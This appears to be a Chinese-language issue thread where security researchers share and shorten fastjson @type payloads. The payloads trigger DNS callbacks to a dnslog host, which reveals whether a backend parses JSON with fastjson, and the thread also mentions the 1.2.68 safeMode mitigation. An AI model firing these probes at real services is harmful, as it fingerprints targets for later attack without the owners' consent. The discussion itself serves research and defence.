3
java.net.InetAddress
虽然被禁止了,但是依然可以使用如下两个payload探测后端是否是fastjson
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
java.net.InetAddress
虽然被禁止了,但是依然可以使用如下两个payload探测后端是否是fastjson
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
而且无需开启autotype
java.net.InetAddress
虽然被禁止了,但是依然可以使用如下两个payload探测后端是否是fastjson{"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"}
nice work, thx!
我再发一个畸形的
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
@retanoj nb,下午也刚好和其他师傅聊到这个payload
新知识get
还有很早的那个ysoserial里的由HashMap触发的URLDNS也能用,只不过也有点畸形
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
然而都没啥卵用啊,只能发个dns
学习了
不造你为啥要变那么畸形
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
看样子,最新的bypass也快出来了:)
@threedr3am 赞,再短点
Set[{"@type":"java.net.URL","val":"dnslog"}]
再短
Set[{"@type":"java.net.URL","val":"dnslog"}
再
{{"@type":"java.net.URL","val":"dnslog"}:0
amazing :-)
tql
能获取到啥敏感信息吗
https://github.com/alibaba/fastjson/releases/tag/1.2.68 1.2.68版本提供了safeMode配置,可以完全禁用autoType,包括白名单和黑名单。
@retanoj 师傅,以上畸形的payload只能探测到存在fastjson是么?实际利用有什么思路么?
@retanoj 师傅,以上畸形的payload只能探测到存在fastjson是么?实际利用有什么思路么?
java.net.Inet4Address 这个payload只能发dns,没有利用方法了吧